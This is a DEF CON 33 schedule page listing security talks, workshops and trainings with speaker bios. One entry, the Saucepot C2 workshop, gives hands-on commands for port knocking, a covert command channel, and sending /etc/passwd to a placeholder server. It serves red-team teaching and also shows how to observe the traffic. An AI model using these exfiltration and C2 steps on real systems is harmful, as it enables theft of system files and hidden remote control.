Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 13:30-14:15 PDT


Title: Weaponizing Trust: Investigating a Threat Actor Targeting Security Researchers and Academics
When: Friday, Aug 8, 13:30 - 14:15 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

You patch vulnerabilities, sandbox malware, and audit code. You know not to click suspicious links. But what if the real threat isn't in phishing emails or zero-days—but in the very tools and research you're relying on? In late 2024, we uncovered a new threat actor, MUT-1244, targeting security professionals, red teamers, and academics. They use trojanized proof-of-concept exploits and fake software updates to exploit trust in open-source tools and research environments.

During our investigation, we discovered over 390,000 leaked credentials that MUT-1244 exfiltrated from a compromised actor, revealing the scale of their operation. In this talk, we'll reveal how MUT-1244 operates through fake GitHub profiles and showcase our use of OSINT to map their infrastructure and tactics. We'll also share our attribution findings and methodology.

Attendees can expect to hear technical details of the campaigns conducted by this threat actor, some notes on attribution, ideas for detecting this activity in your environment and the story of how the speakers discovered over 390,000 credentials inadvertently stolen from unrelated threat actors by MUT-1244.

References:

Speakers:Christophe Tafani-Dereeper,Matt Muir

SpeakerBio:  Christophe Tafani-Dereeper

Christophe lives in Switzerland and works on cloud security research and open source at Datadog. He previously worked as a software developer, penetration tester and cloud security engineer. Christophe is the maintainer of several open-source projects such as Stratus Red Team, GuardDog, CloudFlair, Adaz, and the Managed Kubernetes Auditing Toolkit (MKAT).

SpeakerBio:  Matt Muir

Matt is a security researcher with a passion for UNIX and UNIX-like operating systems. He previously worked as a macOS malware analyst and his background includes experience in the areas of digital forensics, DevOps, and operational cyber security. Matt enjoys technical writing and has published research including the discovery of the first malware family to target AWS Lambda, emerging cloud-focused botnets, and a series of novel Linux malware campaigns.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 10:00-10:20 PDT


Title: Welcome to DEF CON 33!
When: Friday, Aug 8, 10:00 - 10:20 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:
SpeakerBio:  Jeff "The Dark Tangent" Moss, DEF CON Communications, Inc.

Mr. Moss is an internet security expert and is the founder of Both the Black Hat Briefings and DEF CON Hacking conferences.


Return to Index    -    Add to Google    -    ics Calendar file

PLV - Friday - 15:00-15:45 PDT


Title: What Europeans are doing right about cyber security
When: Friday, Aug 8, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W232 - Map

Description:
Speakers:Muhammad Mudassar Yamin,Espen Torseth

SpeakerBio:  Muhammad Mudassar Yamin

Dr. Muhammad Mudassar Yamin is currently working as an Associate Professor at the Department of Information and Communication Technology at the Norwegian University of Science and Technology (NTNU). He is a member of the system security research group, and the focus of his research is on system security, penetration testing, security assessment, and intrusion detection. Before joining NTNU, Mudassar worked as an Information Security consultant and served multiple government and private clients. He holds multiple cybersecurity certifications, such as OSCE, OSCP, LPT-MASTER, CEH, CHFI, CPTE, CISSO, and CBP.

SpeakerBio:  Espen Torseth
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

GHV - Saturday - 13:00-13:45 PDT


Title: What Game Hackers teach us about Offensive Security and Red Teaming
When: Saturday, Aug 9, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Game cheats and malware share the same stealthy DNA - this talk breaks down how. We’ll explore cheat loaders and draw parallels between anti-cheat countermeasures and enterprise EDR techniques.

SpeakerBio:  Joe "Juno" Aurelio, Security Researcher

Joe Aurelio is a distinguished security researcher with over a decade of hands-on experience in vulnerability research, reverse engineering, and mobile security. He currently leads teams of researchers in the private sector securing large-scale technology platforms. His expertise spans both the private and defense sectors, with a track record of uncovering critical security vulnerabilities in mobile applications and complex infrastructure affecting millions of users. In addition to his work in traditional security domains, he channels his passion for cybersecurity education with a unique interest in exploring game hacking techniques. He is a lead of the Game Hacking Village, where he teaches security by turning game hacks into ethical and engaging educational tools. Joe has a broad background in security, underscored by the highly respected OSCP certification and a Master’s degree in computer science.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 13:00-13:45 PDT


Title: What is Dead May Never Die: The Ghost of Internet Explorer in Windows: MapUrlToZone
When: Friday, Aug 8, 13:00 - 13:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

In 2023, Microsoft detected a nation state actor (Forest Blizzard/STRONTIUM) exploiting a "zero-click" remote code execution vulnerability in Outlook by sending a malicious email. Microsoft fixed this in part by adding a call to the MapUrlToZone API, which determines where a path is located so callers can make a trust decision. Critical components like Outlook, Office, Windows Shell and sandboxes rely on MapUrlToZone to make intelligent security decisions, but little research has historically focused on MapUrlToZone itself. Microsoft Security Response Center has a unique role in analyzing systemic trends in areas like this and drive deep technical research to remediate security issues. This talk will focus on MSRC's review of the MapUrlToZone API which identified several novel ways to trick Windows into thinking that a remote untrusted file exists on the local machine. We will talk about how we approached this research and exploited key differences in how MapUrlToZone and the Windows filesystem parse file paths. In total, this research identified a dozen CVEs across various vulnerability types. All of the issues covered have been fixed with CVEs in early 2025. In addition to the individual fixes for this component, we'll also cover how MSRC worked with internal teams to build more comprehensive mitigations.

References:

  • There is very little prior research on MapUrlToZone. Our main reference point was Ben Barnea's recent research link, link.
Speakers:George Hughey,Rohit Mothe

SpeakerBio:  George Hughey

George is passionate about Windows Security and improving the security landscape for all Windows users. Over the past five years as a member of MSRC's Vulnerabilities and Mitigations Team, George has investigated various components in Windows, hunting for and remediating the most pervasive vulnerabilities in the ecosystem.

SpeakerBio:  Rohit Mothe

Rohit Mothe is a Security Researcher on the Vulnerabilities & Mitigations team at the Microsoft Security Response Center (MSRC) and has experience researching and exploiting vulnerabilities for over a decade in various roles.


Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Friday - 13:00-13:45 PDT


Title: What is Dead May Never Die: The Immortality of SDK Bugs
When: Friday, Aug 8, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

Any chip of sufficient complexity needs one thing if they want to actually get used in devices - a Software Development Kit (SDK). This collection of binaries, proprietary services, and code samples allows board designers to quickly and easily incorporate an otherwise complex chip into their existing environments. However, once this code is bundled into various product lines from various vendors, it becomes nearly impossible to make sure it gets updated with new versions. What happens if a vulnerability is discovered? Suddenly, hundreds of thousands of devices all from different vendors spanning years of releases are all affected by the same bug and it turns into a perpetual game of whack-a-mole trying to get them all patched. And botnet authors are definitely paying attention. In this talk, we will discuss the attack surfaces present in the SDKs from some major chipset manufacturers, talk about some exploits (both old-day and 0-day), and try to figure out what can be done to cleanse the internet of the zombie SDK vuln plague.

Speakers:Richard "HeadlessZeke" Lawshae,Chiao-Lin "Steven Meow" Yu,Kai-Ching "Keniver" Wang

SpeakerBio:  Richard "HeadlessZeke" Lawshae, Principal Security Researcher at Keysight Technologies

Ricky "HeadlessZeke" Lawshae is a Principal Security Researcher for Keysight Technologies. He has been hunting vulnerabilities in IoT devices for the past 15 years or so and has discovered and disclosed dozen of vulnerabilities in products from HID Global, Crestron, Meta, Mazda, Realtek, and more. His work has been featured in Wired, Forbes, Hackaday, and the CISA KEV list. He is based out of beautiful Austin, TX (AHA! represent)

SpeakerBio:  Chiao-Lin "Steven Meow" Yu, Threat Researcher at Trend Micro Red Team

Chiao-Lin Yu (Steven Meow) currently serves as a Red Team Cyber Threat Researcher at Trend Micro. He holds numerous professional certifications including OSCE³ , OSEP, OSWE, OSED, OSCP, CRTP, CARTP, CESP-ADCS, LTP, CPENT, GCP ACE. Steven has previously presented at events such as Security BSides Tokyo 2023, HITCON Bounty House, and CYBERSEC 2024, 2025. He has disclosed 20+ CVE vulnerabilities in major companies like VMware, D-Link, and Zyxel. His expertise spans red team exercises, web security and IoT security.

SpeakerBio:  Kai-Ching "Keniver" Wang, Senior Security Researcher at CHT Security

Kai-Ching Wang (Keniver) is a Senior Security Researcher at CHT Security. He specializes in red team assessments and comprehensive security reviews, with a current focus on hacking IoT devices and cloud-native infrastructure. He has presented his research on the security of cloud-connected IoT camera systems at conferences such as SECCON in Japan and HITCON in Taiwan.


Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Saturday - 12:00-12:30 PDT


Title: What’s Really in the Box? The Case for Hardware Provenance and HBOMs
When: Saturday, Aug 9, 12:00 - 12:30 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

As software supply chains embrace transparency through SBOMs, hardware remains a black box. Yet the chips inside our IoT devices carry just as much — if not more — risk. From cloned components to opaque fabs, the semiconductor supply chain is fast becoming a national security flashpoint. Governments are scrambling to respond with blunt tools like bans and onshoring, but these approaches are slow, costly, and often impractical. Traditional BOMs focus on procurement and production — what gets bought and assembled — but they rarely capture origin, integrity, or risk context. They weren’t built to expose inter-organizational dependencies or detect supply chain manipulation. Enter the HBOM Initiative — a new effort to bring visibility, traceability, and accountability to the hardware supply chain. By developing tools and practices for a hardware bill of materials (HBOM), we aim to expose hidden risks, trace chip provenance, and empower sectors to make smarter, risk-informed decisions without sacrificing adaptability or innovation. This talk will explore why HBOMs are inevitable, what makes them hard, and how the hacker and security community can help shape the future of hardware trust.

SpeakerBio:  Allan Friedman, Adjunct Professor of Informatics at the Luddy School of Informatics, Computing, and Engineering at Indiana University
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 10:00-10:45 PDT


Title: Where’s My Crypto, Dude? The Ultimate Guide to Crypto Money Laundering (and How to Track It)
When: Saturday, Aug 9, 10:00 - 10:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

Cryptocurrency is everywhere now. Billion-dollar companies are built on it, entire economies run on Bitcoin, and cybercriminals love using it to finance their operations or hide stolen money. Cryptocurrencies promise anonymity, yet blockchain transactions are fully public, and make it tricky to hide funds.

In February 2025, the Bybit breach exposed two advanced attack vectors. First, a third-party wallet tool was compromised through malicious JavaScript injected into its logic, allowing attackers to manipulate smart contract behavior. Second, a SAFE Wallet developer was tricked through social engineering into running a fake Docker container, giving attackers persistent access to his machine.

With control established, they hijacked proxy contracts and executed stealth withdrawals of ETH and ERC-20 tokens. The stolen assets were laundered through decentralized exchanges, split across multiple wallets, bridged to Bitcoin, and passed through mixers like Wasabi Wallet.

So how do attackers manage to launder crypto, and how can we stop them? Using the 1.46 billion dollar Bybit hack by North Korea’s Lazarus Group as a case study, this talk breaks down each laundering step and explains how to automate tracking and accelerate investigations using AI.

References:

SpeakerBio:  Thomas "fr0gger_" Roccia

Thomas Roccia is a Senior Security Researcher at Microsoft with over 15 years of experience in the cybersecurity industry. His work focuses on threat intelligence and malware analysis.

Throughout his career, he has investigated major cyberattacks, managed critical outbreaks, and collaborated with law enforcement while tracking cybercrime and nation-state campaigns. He has traveled globally to respond to threats and share his expertise.

Thomas is a regular speaker at leading security conferences and an active contributor to the open-source community. Since 2015, he has maintained the Unprotect Project, an open database of malware evasion techniques. In 2023, he published Visual Threat Intelligence: An Illustrated Guide for Threat Researchers, which became a bestseller and won the Bronze Foreword INDIES Award in the Science & Technology category.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 11:00-11:50 PDT


Title: Whispers Through the Firewall: Data Exfiltration and C2 with Port Knocking
When: Saturday, Aug 9, 11:00 - 11:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 4 - Map

Description:

Port knocking is a stealthy network authentication technique (T1205.001) in which a client sends a specific sequence of connection attempts (or "knocks") to closed ports on a server. When the correct sequence is received, the server dynamically opens a port or triggers an action, enabling concealed access or communication. Saucepot C2 elevates the port knocking technique to a new level. Instead of using destination ports (DstPorts) in TCP sessions as knock sequences, it leverages source ports (SrcPorts), also known as ephemeral ports. This approach allows data exfiltration even in highly restrictive firewall environments where only a single outbound port, such as port 443, is allowed.

In this workshop, attendees will use Saucepot C2 in conjunction with the following MITRE ATT&CK techniques to conduct specific Red Team activities:

Technique ID Technique Name Tactic
T1041 Exfiltration Over C2 Channel Exfiltration
T1071.001 Application Layer Protocol: Web Command and Control
T1205.001 Traffic Signaling: Port Knocking Command and Control / Defense Evasion

Saucepot C2 has been open-sourced at https://github.com/netskopeoss/saucepot. Supported commands or features in Sacuepot C2 include: - Check-in / heartbeat - Directory listing - Process listing - File upload

Hardware requirements

  • One AWS EC2 t3.micro (or equivalent) VPC instance with at least 1 GB of RAM and 8 GB of storage to serve as the server
  • One AWS EC2 t3.micro (or equivalent) VPC instance (easier option), or a laptop (more difficult option), to serve as the client

Software requirements

Server: sudo apt install net-tools knockd nginx python3-pip python3-scapy git clone https://github.com/netskopeoss/saucepot echo "v2025.8" | sudo tee /var/www/html/chk-version

Client: sudo apt install net-tools python3-tqdm python3-psutil python3-pycurl git clone https://github.com/netskopeoss/saucepot

Workshop details

  • Exercise 1: Traditional port knocking Reveal a web server running on port 80 using the port knocking technique. Once the correct knock sequence is provided, the firewall will be temporarily lifted for that specific client.

Server: Hide the web server until the correct knock sequences (4100, 4200, 4500) have been provided.

sudo iptables -I INPUT -p tcp --dport 80 -j REJECT sudo systemctl start nginx

Add the following section to /etc/knockd.conf [OpenCloseSecretWeb] sequence = 4100,4200,4500 seq_timeout = 30 tcpflags = syn start_command = /usr/sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT cmd_timeout = 7200 stop_command = /usr/sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT

If the default interface is not eth0, add Interface = InterfaceName to the [options] section.

Restart the knockd: sudo systemctl restart knockd

Client:

The protected web service should be unreachable by default.

curl http://server_public_ip

Provide the correct knock sequences; the protected web service should now be reachable.

for f in 4100 4200 4500; do nc -w2 server_public_ip $f; done curl http://server_public_ip

  • Exercise 2: Ephemeral port checker Check whether you're in a friendly environment where the client's source port is preserved after NAT, a crucial requirement for ephemeral port abuse to work. If the laptop's network environment fails the test, an additional VPC instance will be needed to act as the client.

    Server: sudo systemctl stop nginx sudo python3 saucepot-server.py -c -p 80

    Client: ``` python3 saucepot-client.py -c -d server_public_ip -p 80

    Test 1 with ephemeral port 63034: PASS Test 2 with ephemeral port 51151: PASS Test 3 with ephemeral port 54321: PASS

    Ephemeral port test succeeded. Enjoy Port Knocking 2.0 technique! ```

  • Exercise 3: Data exfiltration Exfiltrate a specified file to the server without establishing persistent TCP connections. The connection state is managed through different port-knocking sequences, such as session-start and session-end. The data to be exfiltrated is transmitted via the source port (SrcPort) field of TCP packets within a designated port range.

    Server: sudo python3 saucepot-server.py -d 172.31.253.199 -p 80

    Client: Exfiltrate /etc/passwd to the server

    python3 saucepot-client.py -d server_public_ip -p 80 --upload /etc/passwd

  • Exercise 4: Command-and-control operations To achieve bidirectional communication, the Last-Modified header in HTTP responses is used to deliver C2 commands to the client. Saucepot C2 currently supports a few simple commands, such as ls, ps, and others.

    Server: sudo systemctl start nginx sudo python3 saucepot-server.py -d 172.31.253.199 -p 80

    Client: python3 saucepot-client.py -d server_public_ip -p 80

  • Exercise 5: Observation of anomalies at L4 and L7 Observe the anomalies at L4 and L7

    On the server, in two separate windows:

    web access log: tail -F /var/log/nginx/access.log

    SYN packets: sudo tcpdump -i enX0 -n 'tcp[tcpflags] & tcp-syn != 0'

This workshop has been verified on Ubuntu 24.04 LTS

Troubleshoot Guide:

  • Python packages required
  • VPC instance's inbound firewall to allow 80/tcp and those used in traditional port-knock sequences
  • Use VPC instance NIC's private IP address in exercise 3 & 4 for the -d ip arg on Server
SpeakerBio:  Hubert Lin

Hubert Lin is an offensive security expert specializing in remote vulnerability exploitation, honeypots, and penetration testing. He previously led a signature team for network threat defense and served as a senior staff engineer on a Red Team, where he evaluated network intrusion prevention systems and conducted sanctioned red team exercises to strengthen corporate security. Hubert holds certifications as a Red Hat Certified Engineer (RHCE) and an Offensive Security Certified Professional (OSCP). Currently, he works at Netskope as a Principal Researcher and has talked at DEFCON Cloud Village, RSAC, BSidesLV, BSidesSG, Australian CyberCon, GovWare, and CYBERSEC in the past few years.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 09:00-12:59 PDT


Title: Whitebox Web Exploit Dev (WWED)
When: Friday, Aug 8, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N252 - Map

Description:

WWED is designed for students to gain experience exploiting real world web applications and take their assessment skills to the next level. Students will learn advanced vulnerability discovery techniques to identify and exploit vulnerabilities in real world web applications. Getting hands-on experience using free and widely available Linux utilities to observe application behavior, to more effectively discover and exploit application vulnerabilities. Using a whitebox approach students will rapidly discover and exploit non-trivial bugs. Not requiring the use of expensive commercial tools or with the guess work which comes along with blackbox testing.

Students will be provided virtual machines of commercially available software applications which will be used for this heavily lab focused course. At the conclusion of the class each student will have developed a fully functional remote root PoC. This course targets a wide level of skill levels and will leverage a hints system to help students who may fall behind. Incrementally releasing solutions through each exercise.

Speakers:Cale "calebot" Smith,Luke Cycon,Young Seuk Kim,Priyanka Joshi

SpeakerBio:  Cale "calebot" Smith

Cale Smith is a nerd who loves both building but also breaking, so he can get better at building. He is passionate about understanding how anything and everything works, improving security along the way is just a bonus. Also, he is passionate about sharing his passion and created this course to pass along some of the more accessible techniques he has picked up. His professional career originated exclusively as a builder, but has been focusing on the security and breaking side for the last 15 years. During that time he has dabbled in the web weenie life, cloud, binary, IoT and mobile most recently. Currently he manages a device oriented AppSec team at Amazon. While AFK he is probably riding a bike or climbing rocks.

SpeakerBio:  Luke Cycon

Security engineer by day, barbecue hacker by night—celebrating each fixed bug with a bit too much somaek. Off the clock, you'll find him tinkering with hardware or firing lasers at something.

SpeakerBio:  Young Seuk Kim

Husband, father, hacker, gamer. Young’s path into security started like a good game exploit—he wanted to win, bent the rules, and discovered a passion for hacking. He began as a web app security consultant, moved into penetration testing and red teaming, and now works in application security engineering, helping teams build secure systems (and still breaking things for fun). He also dives into all kinds of games and stories, especially fantasy with Eastern martial arts, and loves dissecting media with the same curiosity he brings to code.

SpeakerBio:  Priyanka Joshi

Priyanka sustained her academic voyage using curiosity as her paddles before landing her first job as a software security engineer in an ancient company. For three years thereafter, she focused on research, development and security testing of OAuth2.0 and OpenID implementations. This experience led to her discovery of her passion in the identity space. In her current appsec engineer adventure at Amazon, she enjoys working on secure design assessments, bug bounty triage and fix validation, consults and security testing of web services. In her leisure, she enjoys hiking, lazy gymming, sketching, singing, watching anime and reading manga.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Friday - 22:30-00:30 PDT


Title: Whose Slide Is It Anyway?
When: Friday, Aug 8, 22:30 - 00:30 PDT
Where: Unknown

Description:

“Whose Slide Is It Anyway?” is the unholy union of improv comedy, hacking, and slide deck sado-masochism. We are the embodiment of the hacker battle cry "FUCK IT, WE'LL DO IT IN PROD."

Our team of slide monkeys will create a stupid amount of short slide decks on whatever nonsense tickles our fancies. Slides are not exclusive to technology, they can and will be about anything. Contestants will take the stage and choose a random number corresponding to a specific slide deck. They will then improvise a minimum 5 minute / maximum 10 minute lightning talk, becoming instant subject matter experts on whatever topic/stream of consciousness appears on the screen.

But....why?

Because for us, the stage is hallowed ground and since stupidity can't be stopped, we decided to weaponize it. Whether you delight in the chaos of watching your fellow hackers squirm or would like to sacrifice yourself to the Contest Gods, it’s a night of schadenfreude for the whole family.

Participant Prerequisites

A blatant and offensive disregard to any and all comfort zones to which one has heretofore been accustomed.

Pre-Qualification

None.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 09:00-12:59 PDT


Title: Wi-Fi-So-Serious
When: Saturday, Aug 9, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N256 - Map

Description:

In Wi-Fi-So-Serious, we will explore setting up and troubleshooting a 802.11(Wi-Fi) assessment rig. Then, we will look at passive reconnaissance and cracking different Wi-Fi security protocols. Using the Kali Linux VM, we will set up our 802.11 cards in monitor mode and configure them to collect PCAPs. Participants will be taught the methodology and commands needed to troubleshoot wireless cards in Linux. We will work with command line tools like iw, iwconfig, hostapd, wpa_cli, and wpa_supplican along with others. Next, the course challenges participants to perform passive collections and work with Wireshark display filters. The course then covers cracking common 802.11 security protocols with Aircrack-ng, Wifite, Airgeddon, Reaver, and Wacker.The Wi-Fi-So-Serious workshops concludes with a Capture The Flag (CTF) so that participants can apply the course content with hands on keyboard. Participants will also learn how to set up a lab they can take home with them

Speakers:James Hawk,Brian Burnett

SpeakerBio:  James Hawk, Principal Consultant at GPS

James Hawk (He/Him) is a Principal Consultant with Google Public Sector within Proactive Services. He is the wireless subject matter expert for his team. James has led and contributed to numerous assessments (Red Teams and Pen Tests). He has developed internal training and tool updates for 802.11 for his company. James is a 20-year veteran of the U.S. Army and has over 10 years of hands-on experience in wireless technologies. James is constantly researching/testing 802.11 attacks against his home lab. He is a fan of hockey, LetterKenny, and almost anything sci-fi.

SpeakerBio:  Brian Burnett, Founder of Offensive Technical Solutions

Brian Burnett is the founder of Offensive Technical Solutions (OTS) where he conducts web-application, internal network, and cloud penetration tests. Prior to founding OTS, he served five years in the United States Army, followed by seven years supporting internal teams at Fortune 500 companies. Brian holds degrees in computer science, pentesting, theology, and Russian. He enjoys tinkering with his homelab, collecting certifications, and committing poorly written code. His hobbies include Brazilian Jiu-Jitsu, purchasing unnecessary power tools, and CrossFit.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 12:30-13:15 PDT


Title: Win-DoS Epidemic: A crash course in abusing RPC for Win-DoS & Win-DDoS
When: Sunday, Aug 10, 12:30 - 13:15 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

DCs are organizations’ core. A successful DoS attack against them can break authentication and paralyze operations.

Following our LdapNightmare release, the first public DoS exploit for CVE-2024-49113, we found two new DoS-style attack surfaces on DCs: new critical DoS vulnerabilities, and creating a botnet harnessing public DCs for DDoS. Our goal: create the Win-DoS epidemic - infect DCs with Win-DoS and make them infect others, forming Win-DDoS.

Building on LDAPNightmare, we explored client-side targeting, often exposing weaker code. By turning DCs into LDAP clients via NetLogon RPC, using LDAP referrals, we redirected them to chosen domains/ports, matching our goals.

Moreover, we knew DDoS was powerful, but aimed to replicate its effect from a single machine. We focused on RPC servers - abundant in Windows with wide attack surfaces, especially those not requiring authentication. By abusing security gaps in RPC bindings, we hit the same RPC server relentlessly from one system, far surpassing standard concurrency limits! and WOW, found vulns crashing any Windows: servers and endpoints alike!

We present “Win-DoS Epidemic” - DoS tools exploiting four new Win-DoS and one Win-DDoS zero-click vulns! Crash any Windows endpoint/server, including DCs, or launch a botnet using public DCs for DDoS. The epidemic has begun

References:

Speakers:Or "oryair1999" Yair,Shahak Morag

SpeakerBio:  Or "oryair1999" Yair

Or Yair (@oryair1999) is a security research professional with seven years of experience, currently serving as the Security Research Team Lead at SafeBreach. His primary focus lies in vulnerabilities in the Windows operating system’s components, though his past work also included research of Linux kernel components and some Android components. Or's research is driven by innovation and a commitment to challenging conventional thinking. He enjoys contradicting assumptions and considers creativity as a key skill for research. Or frequently presents his vulnerability and security research discoveries internationally at top conferences he speaks at such as Black Hat, DEF CON, RSAC, SecTor, and many more.

SpeakerBio:  Shahak Morag

Shahak, Currently serving as the Research Lead at SafeBreach, with over seven years of experience in security research. My background includes extensive expertise in Linux kernel and embedded systems, with more than one year of focused research on Windows platforms.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Windows Payload Development: EDR Evasion and Initial Access Tradecraft
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This training is a hands-on, immersive course designed to teach participants the art of crafting evasive Windows payloads while navigating and bypassing modern Endpoint Detection and Response (EDR) systems. Through a blend of theory and practical exercises, attendees will gain a deep understanding of payload development, focusing on techniques that enhance stealth, modularity, and effectiveness in offensive operations.

Key topics include payload formats, memory-resident execution, process injection, and advanced evasion strategies. Participants will explore the use of living off the land binaries (LOLBins), design modular implants with secure communication, and develop packers to obfuscate payloads and evade detection. By the end of the course, students will possess the knowledge and skills to craft realistic initial access vectors and deploy sophisticated payloads capable of evading modern defensive controls.

Speakers:Rey "Privesc" Bango,Kevin Clark

SpeakerBio:  Rey "Privesc" Bango, Security Consultant at BC Security

Rey "Privesc" Bango is a Principal Cloud Advocate at Microsoft and a Security Consultant specializing in red teaming at BC Security. At Microsoft, he focuses on empowering organizations to leverage transformative technologies such as Artificial Intelligence and Machine Learning, prioritizing trust, security, and responsible use. He is an experienced trainer and speaker, presenting and teaching at cybersecurity conferences, including Black Hat and DEF CON. His work continues to bridge the gap between cutting-edge technological advancements and the critical need for secure, ethical implementation in today's world.

SpeakerBio:  Kevin Clark, Red Team Instructor at BC Security

Kevin Clark is a Security Consultant with TrustedSec and a Red Team Instructor with BC Security, with a diverse background in software development, penetration testing, and offensive security operations. Kevin specializes in initial access techniques and Active Directory exploitation. He has contributed to open-source projects such as PowerShell Empire and developed custom security toolkits, including Badrats and Ek47. A skilled trainer and speaker, Kevin has delivered talks and conducted training sessions all over the country at cybersecurity conferences, including Black Hat and DEF CON, and authors a cybersecurity blog at https://henpeebin.com/kevin/blog.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Windows Payload Development: EDR Evasion and Initial Access Tradecraft
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This training is a hands-on, immersive course designed to teach participants the art of crafting evasive Windows payloads while navigating and bypassing modern Endpoint Detection and Response (EDR) systems. Through a blend of theory and practical exercises, attendees will gain a deep understanding of payload development, focusing on techniques that enhance stealth, modularity, and effectiveness in offensive operations.

Key topics include payload formats, memory-resident execution, process injection, and advanced evasion strategies. Participants will explore the use of living off the land binaries (LOLBins), design modular implants with secure communication, and develop packers to obfuscate payloads and evade detection. By the end of the course, students will possess the knowledge and skills to craft realistic initial access vectors and deploy sophisticated payloads capable of evading modern defensive controls.

Speakers:Rey "Privesc" Bango,Kevin Clark

SpeakerBio:  Rey "Privesc" Bango, Security Consultant at BC Security

Rey "Privesc" Bango is a Principal Cloud Advocate at Microsoft and a Security Consultant specializing in red teaming at BC Security. At Microsoft, he focuses on empowering organizations to leverage transformative technologies such as Artificial Intelligence and Machine Learning, prioritizing trust, security, and responsible use. He is an experienced trainer and speaker, presenting and teaching at cybersecurity conferences, including Black Hat and DEF CON. His work continues to bridge the gap between cutting-edge technological advancements and the critical need for secure, ethical implementation in today's world.

SpeakerBio:  Kevin Clark, Red Team Instructor at BC Security

Kevin Clark is a Security Consultant with TrustedSec and a Red Team Instructor with BC Security, with a diverse background in software development, penetration testing, and offensive security operations. Kevin specializes in initial access techniques and Active Directory exploitation. He has contributed to open-source projects such as PowerShell Empire and developed custom security toolkits, including Badrats and Ek47. A skilled trainer and speaker, Kevin has delivered talks and conducted training sessions all over the country at cybersecurity conferences, including Black Hat and DEF CON, and authors a cybersecurity blog at https://henpeebin.com/kevin/blog.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 10:00-17:59 PDT


Title: WipeOut XL hi-score tournament
When: Friday, Aug 8, 10:00 - 17:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C102 - Map

Description:

Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 21:00-23:30 PDT


Title: Women, gender non-conforming and non-binary meetup with The Diana Initiative
When: Friday, Aug 8, 21:00 - 23:30 PDT
Where: LVCCWest-Level2-W205 - Map

Description:

We'd love to get all the gender non conforming, non-binary and women together to hang out and make friends! DEF CON is better with friends. Stop in for a bit, or the whole time.


Return to Index    -    Add to Google    -    ics Calendar file

CPV - Sunday - 11:00-11:30 PDT


Title: You Can Mix but You Can’t Hide: Uncovering Node Behaviors in Nym Network
When: Sunday, Aug 10, 11:00 - 11:30 PDT
Where: LVCCWest-Level1-Hall1-W403 - Map

Description:

As surveillance becomes the norm, the development of privacy enhancing technologies is crucial in protecting individuals’ data. In this presentation, I will talk about Nym, a mixnet focused on protecting the metadata during end-to-end communication. I will go over how Nym works, what core features it uses, its tokenomics system, and patterns in node behaviors that I found from scraping all existing nodes’ data from the network explorer for 30 days.

SpeakerBio:  Alexis Cao

Alexis graduated from Johns Hopkins University with a Bachelor of Science degree in Computer Science this May. She is passionate about privacy technologies, and she has been doing research on mixnets. In the past, she has volunteered at Physical Security Village, Red Team Village, and AppSec Village at DEFCON. In her free time, she loves doing jiujitsu and she is a blue belt.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 14:00-14:45 PDT


Title: You snooze you lose: RPC-Racer winning RPC endpoints against services
When: Friday, Aug 8, 14:00 - 14:45 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

The RPC protocol allows executing functions on remote servers. An interface is identified by a UUID, and clients contact specific RPC endpoints to communicate with it. Some endpoints may be well-known to clients, but some are provided through the EPM (Endpoint Mapper). These are called Dynamic Endpoints.

As servers request to map UUIDs to their Dynamic Endpoints, we wondered what stops us from mapping a UUID of a trusted RPC interface to an endpoint that we control, leading to our own malicious RPC interface.

We discovered that nothing stops unprivileged users from imposing as a well-known RPC server! However, to have clients connect to us, we needed to register first. We, as the underdog racer, need to beat services in their home race track.

We examined the status of RPC servers at certain points during boot and mapped several interfaces we can abuse. We then took a shot racing their services and won the gold medal! Various high integrity processes and some even PPLs trusted us to be their RPC server!

In this talk, we’ll present “RPC-Racer” - a toolset for finding insecure RPC services and winning the race against them! We’ll show it manipulating a PPL process to authenticate the machine account against any server we want! Finally, we’ll describe how to validate the integrity of RPC servers, to mitigate this issue.

References:

SpeakerBio:  Ron Ben Yizhak

Ron (@RonB_Y) is a security researcher at SafeBreach with 10 years of experience. He works in vulnerability research and has knowledge in forensic investigations, malware analysis and reverse engineering. Ron previously worked in the development of security products and spoke several times at DEFCON


Return to Index    -    Add to Google    -    ics Calendar file

PSV - Saturday - 16:00-16:30 PDT


Title: Your Passkey is Weak: Phishing the Unphishable
When: Saturday, Aug 9, 16:00 - 16:30 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

